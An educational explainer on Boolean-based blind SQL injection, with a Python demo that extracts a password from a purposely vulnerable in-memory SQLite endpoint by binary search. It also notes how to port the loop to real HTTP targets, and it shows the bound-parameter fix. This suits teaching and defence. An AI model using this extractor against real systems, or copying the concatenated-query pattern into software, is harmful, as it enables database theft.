
When you try to guess secret data from a website's database without seeing any errors, what method uses only "yes" or "no" answers from the website to figure things out?



The method described is Blind SQL Injection, specifically Boolean-based Blind SQL Injection.

SQL Injection is a web security vulnerability that lets an attacker interfere with the queries an application makes to its database, typically because user input is concatenated into a SQL string instead of being passed as a bound parameter. In a Blind SQL Injection attack the attacker never sees the result of the injected query or any database error on the page: the application either suppresses errors or replaces them with a generic message. The attacker instead infers information from the application's behaviour.

Boolean-based Blind SQL Injection reduces that behaviour to a "yes" or "no" answer. The attacker appends a condition to the query so that the whole WHERE clause evaluates to either true or false, and the page responds differently in each case: when the condition is true the page renders its normal content, and when it is false it comes back empty, shows a generic message, or lacks the expected element. Nothing about the data itself is displayed; only the true/false outcome leaks.

By asking a series of such questions the attacker reconstructs the secret one character (or one bit) at a time. To recover a password, for example, the attacker asks "Is the first character of the password 'a'?" If the page behaves as it does for a true condition, the first character is 'a'; if not, the attacker tries 'b', and so on, until the page signals true. In practice the question is usually phrased as a comparison on the character's code (using SUBSTRING, ASCII or the database's equivalent functions) and answered by binary search, which cuts the number of requests per character from dozens to about seven. The process is repeated for every position until the whole value is recovered, all without the attacker ever seeing direct database output or an error message. Time-based blind SQL injection is the related variant used when the page looks identical in both cases: there the true branch is made to sleep and the answer is read from the response delay instead.
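The following is an added worked example, not code from the original page. It simulates the attack end to end against a constructed in-memory SQLite database: a hypothetical endpoint `vulnerable_page` that concatenates a request parameter into SQL and swallows errors (so the only signal is whether a profile renders), a one-question oracle `ask`, and an `extract` routine that recovers a column value character by character using binary search over the character code rather than the linear "is it 'a'?" probing described above. The table, column names and secret value are all assumptions made up for the demonstration; `safe_page` is the same endpoint with a bound parameter, shown for contrast.

```python
import sqlite3

# Constructed sample database standing in for the site's backend: an in-memory
# SQLite table holding the value the attacker wants to recover.
SECRET = "s3cr3t!"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest')")
    conn.commit()
    return conn


CONN = build_db()


def vulnerable_page(user_id: str) -> bool:
    """Hypothetical endpoint that concatenates the request parameter into SQL.
    Returns True when a row is found (the page renders a profile) and False
    otherwise. Database errors are swallowed, so the attacker sees no error
    text, only the presence or absence of the profile."""
    sql = f"SELECT username FROM users WHERE id = {user_id}"
    try:
        return CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_page(user_id: str) -> bool:
    """Hardened form of the same endpoint: the parameter is bound, so the
    input can never change the structure of the query."""
    try:
        row = CONN.execute(
            "SELECT username FROM users WHERE id = ?", (user_id,)
        ).fetchone()
        return row is not None
    except sqlite3.Error:
        return False


REQUESTS = 0  # how many yes/no questions the attacker has sent


def ask(condition: str) -> bool:
    """One yes/no question to the site: inject `condition` after a valid id
    and read the answer from whether the profile is rendered."""
    global REQUESTS
    REQUESTS += 1
    return vulnerable_page(f"1 AND ({condition})")


def extract(column: str, table: str, where: str, max_len: int = 64) -> str:
    """Recover `column` from the row matching `where`, one character at a time.
    Each character is found by binary search over the printable ASCII range
    (codes 32..126) with an "is the code greater than N?" question, which
    needs about seven requests per character instead of up to 95 with the
    naive "is it 'a'? is it 'b'?" approach."""
    target = f"(SELECT {column} FROM {table} WHERE {where})"
    result = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position (a NULL
        # subquery result also fails this test, so a missing row yields "").
        if not ask(f"LENGTH({target}) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: UNICODE() gives the code point, SUBSTR(x, pos, 1) one char.
            if ask(f"UNICODE(SUBSTR({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    recovered = extract("password", "users", "username = 'admin'")
    print(f"recovered {recovered!r} in {REQUESTS} requests")
    print("same injection against the bound-parameter endpoint:",
          safe_page("1 AND 1=1"))
```

Against a real target the same loop would issue HTTP requests and compare response bodies or status codes instead of calling a local function; the binary-search logic and the length check are unchanged. The SUBSTR/UNICODE pair is SQLite-specific; MySQL and PostgreSQL use SUBSTRING with ASCII, and SQL Server uses SUBSTRING with ASCII or UNICODE.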